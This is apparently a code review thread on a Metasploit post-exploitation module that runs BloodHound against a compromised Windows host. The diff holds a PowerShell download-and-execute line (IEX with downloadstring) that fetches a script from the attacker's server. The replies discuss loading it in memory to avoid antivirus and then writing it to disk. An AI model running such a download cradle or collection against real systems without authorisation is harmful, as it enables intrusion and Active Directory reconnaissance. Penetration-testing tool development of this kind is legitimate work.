modules/post/windows/gather/bloodhound.rb

```diff
@@ -95,9 +96,11 @@ def run
       extra_params += "-MaxLoopTime #{datastore['MaxLoopTime']} "
     end
 
-    tmp_path = get_env('TEMP')
-    print_status("Invoking BloodHound with: Invoke-BloodHound -CollectionMethod #{datastore['CollectionMethod']} -Threads #{datastore['Threads']} -JSONFolder \"#{tmp_path}\" -PingTimeout #{datastore['PingTimeout']} -LoopDelay #{datastore['LoopDelay']} #{extra_params}")
-    process, _pid, _c = execute_script("IEX (new-object net.webclient).downloadstring('#{uri}'); Invoke-BloodHound -CollectionMethod #{datastore['CollectionMethod']} -Threads #{datastore['Threads']} -JSONFolder \"#{tmp_path}\" -PingTimeout #{datastore['PingTimeout']} -LoopDelay #{datastore['LoopDelay']} #{extra_params}")
+    tmp_path = datastore['JSONFolder'] ? datastore['JSONFolder'] : get_env('TEMP')
+
+    invoker = "Invoke-BloodHound -CollectionMethod #{datastore['CollectionMethod']} -Threads #{datastore['Threads']} -JSONFolder \"#{tmp_path}\" -PingTimeout #{datastore['PingTimeout']} -LoopDelay #{datastore['LoopDelay']} #{extra_params}"
+    print_status("Invoking BloodHound with: #{invoker}")
+    process, _pid, _c = execute_script("IEX (new-object net.webclient).downloadstring('#{uri}'); #{invoker}")
```

Comment:
Seems like I'm just now noticing that this requires a connect back to Metasploit even though we have a session on the system already. I don't think it's required for this PR, but would you like to take a stab at moving uploading the script to some sort of in-band method?

Reply:
that was actually on my to do list.  The benefit here is its in memory loaded instead of putting on disk (which id think would be a super easy flag for AV).  However, I had to add a NIC to my AD test server to run this since its on a different network.

I'm going to put that lower on the priority list right now though, I'm more concerned with the fact I wasn't able to get this to run successfully on such a small AD.

Reply:
went with writing the `ps1` to disk (i'm sure AV will catch it... but trying to pass it in as base64 threw errors since it was too long).  With that, have to check the executionPolicy, so threw that in as well.